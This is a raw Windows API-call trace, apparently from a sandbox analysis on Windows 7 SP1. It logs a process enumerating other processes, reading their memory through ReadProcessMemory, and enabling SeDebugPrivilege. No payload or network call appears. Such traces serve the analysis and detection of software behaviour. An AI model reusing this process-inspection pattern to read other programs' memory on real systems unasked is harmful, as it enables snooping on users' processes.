[0406.066] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.066] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.088] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd68) returned 0x0
[0406.089] CloseHandle (hObject=0x0) returned 0
[0406.094] _ui64tow (_Value=0x6a8, _Buffer="3432", _Radix=10) returned="1704"
[0406.099] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="1704") returned 4
[0406.100] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.100] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.139] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6a8) returned 0x0
[0406.139] CloseHandle (hObject=0x0) returned 0
[0406.140] _ui64tow (_Value=0x8d0, _Buffer="1704", _Radix=10) returned="2256"
[0406.148] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="2256") returned 4
[0406.150] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.150] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.172] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x0
[0406.172] CloseHandle (hObject=0x0) returned 0
[0406.174] _ui64tow (_Value=0xdd4, _Buffer="2256", _Radix=10) returned="3540"
[0406.182] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3540") returned 4
[0406.183] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.183] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd4) returned 0x240
[0406.209] GetLastError () returned 0x0
[0406.209] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.210] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b26ca, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.211] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.212] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.212] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.212] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.213] malloc (_Size=0xe0) returned 0x2c4740
[0406.213] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2702, lpBuffer=0x2c4740, nSize=0xde, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.213] free (_Block=0x2c4740)
[0406.214] CloseHandle (hObject=0x240) returned 1
[0406.215] _ui64tow (_Value=0xdbc, _Buffer="3540", _Radix=10) returned="3516"
[0406.219] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3516") returned 4
[0406.224] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.224] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdbc) returned 0x240
[0406.255] GetLastError () returned 0x0
[0406.255] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.255] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.255] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.256] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e2340, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.256] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e215a, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.257] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.258] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.258] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e1990, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] malloc (_Size=0xe8) returned 0x2c4740
[0406.259] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e219a, lpBuffer=0x2c4740, nSize=0xe6, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] free (_Block=0x2c4740)
[0406.260] CloseHandle (hObject=0x240) returned 1
[0406.261] _ui64tow (_Value=0xdec, _Buffer="3516", _Radix=10) returned="3564"
[0406.266] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3564") returned 4
[0406.267] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x124398, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.267] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdec) returned 0x240
[0406.294] GetLastError () returned 0x0
[0406.299] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.299] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.299] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2428c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2426d4, lpBuffer=0x12dd100, nSize=0x44, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.301] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.302] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.303] malloc (_Size=0x74) returned 0x2c1300
[0406.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x242718, lpBuffer=0x2c1300, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0406.303] free (_Block=0x2c1300)
[0406.304] CloseHandle (hObject=0x240) returned 1
[0406.305] _ui64tow (_Value=0xde8, _Buffer="3564", _Radix=10) returned="3560"
[0406.309] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3560") returned 4
[0406.311] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.311] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.338] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xde8) returned 0x240
[0406.338] GetLastError () returned 0x0
[0406.338] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.338] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b27e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b26c8, lpBuffer=0x12dd100, nSize=0x3a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.341] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] malloc (_Size=0x10) returned 0x2beee0
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b2702, lpBuffer=0x2beee0, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2beee0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] free (_Block=0x2beee0)
[0406.343] CloseHandle (hObject=0x240) returned 1
[0406.344] free (_Block=0x2c9a30)
[0406.344] malloc (_Size=0x48) returned 0x2bd400
[0406.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12dd918 | out: lpSystemTimeAsFileTime=0x12dd918*(dwLowDateTime=0x9e39340, dwHighDateTime=0x1dab599))
[0406.344] SetEvent (hEvent=0x1f8) returned 1
[0406.360] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x4) returned 0x15da80
[0406.360] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x15da80, pulNumLanguages=0x12de480 | out: pulNumLanguages=0x12de480) returned 1
[0406.360] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da80 | out: hHeap=0x120000) returned 1
[0410.794] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0410.813] SetLastError (dwErrCode=0x0)
[0410.813] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da90
[0410.813] SetLastError (dwErrCode=0x0)
[0410.813] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da90, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da90, pcchLanguagesBuffer=0x12de390) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da80
[0410.813] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da90 | out: hHeap=0x120000) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x14) returned 0x196160
[0410.814] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x196160, pulNumLanguages=0x12de488 | out: pulNumLanguages=0x12de488) returned 1
[0410.814] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x196160 | out: hHeap=0x120000) returned 1
[0410.817] SafeArrayGetElemsize (psa=0x1b0710) returned 0x8
[0410.818] SafeArrayPutElement (psa=0x1b0710, rgIndices=0x12ddcc0, pv=0x1c5fd8) returned 0x0
[0410.818] SafeArrayRedim (in: psa=0x1b0710, psaboundNew=0x12ddcd8 | out: psa=0x1b0710) returned 0x0
[0410.818] SafeArrayCopy (in: psa=0x1b0710, ppsaOut=0x12ddc20 | out: ppsaOut=0x12ddc20) returned 0x0
[0410.820] SetEvent (hEvent=0x1f8) returned 1
[0410.820] free (_Block=0x2bd400)
[0410.820] GetCurrentThread () returned 0xfffffffffffffffe
[0410.820] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0x12dda78 | out: TokenHandle=0x12dda78*=0x24c) returned 1
[0410.820] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12dda54 | out: lpLuid=0x12dda54*(LowPart=0x14, HighPart=0)) returned 1
[0410.822] SetLastError (dwErrCode=0x0)
[0410.822] AdjustTokenPrivileges (in: TokenHandle=0x24c, DisableAllPrivileges=0, NewState=0x12dda50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0410.822] GetLastError () returned 0x514
[0410.822] CloseHandle (hObject=0x24c) returned 1
[0410.823] malloc (_Size=0x18) returned 0x2bef20
[0410.823] SafeArrayPutElement (psa=0x1b0250, rgIndices=0x12ddaf8, pv=0x1b0188) returned 0x0
[0410.823] SafeArrayPutElement (psa=0x1b0150, rgIndices=0x12ddaf8, pv=0x1b0188) returned 0x0
[0410.823] free (_Block=0x2bef20)
[0410.823] malloc (_Size=0x8000) returned 0x2e6250
[0410.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e6250, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x2e6250, ResultLength=0x0) returned 0xc0000004
[0410.831] free (_Block=0x2e6250)
[0410.831] malloc (_Size=0x10000) returned 0x2e6250
[0410.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e6250, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e6250, ResultLength=0x0) returned 0xc0000004
[0410.833] free (_Block=0x2e6250)
[0410.833] malloc (_Size=0x18000) returned 0x2c9220
[0410.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9220, Length=0x18000, ResultLength=0x0 | out: SystemInformation=0x2c9220, ResultLength=0x0) returned 0x0
[0410.834] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0410.839] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="0") returned 1
[0410.840] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x9a001882, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.840] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.855] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0410.855] CloseHandle (hObject=0x0) returned 0
[0410.856] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0410.860] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="4") returned 1
[0410.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.893] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0410.893] CloseHandle (hObject=0x0) returned 0
[0410.895] _ui64tow (_Value=0x10c, _Buffer="4", _Radix=10) returned="268"
[0410.902] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="268") returned 3
[0410.903] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.903] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0
[0410.926] CloseHandle (hObject=0x0) returned 0
[0410.927] _ui64tow (_Value=0x154, _Buffer="268", _Radix=10) returned="340"
[0410.932] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="340") returned 3
[0410.933] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.933] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0
[0410.955] CloseHandle (hObject=0x0) returned 0
[0410.956] _ui64tow (_Value=0x178, _Buffer="340", _Radix=10) returned="376"
[0410.960] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="376") returned 3
[0410.961] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.982] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0
[0410.982] CloseHandle (hObject=0x0) returned 0
[0410.983] _ui64tow (_Value=0x184, _Buffer="376", _Radix=10) returned="388"
[0410.987] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="388") returned 3
[0410.988] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.988] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0
[0411.009] CloseHandle (hObject=0x0) returned 0
[0411.010] _ui64tow (_Value=0x1ac, _Buffer="388", _Radix=10) returned="428"
[0411.015] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="428") returned 3
[0411.016] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.016] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
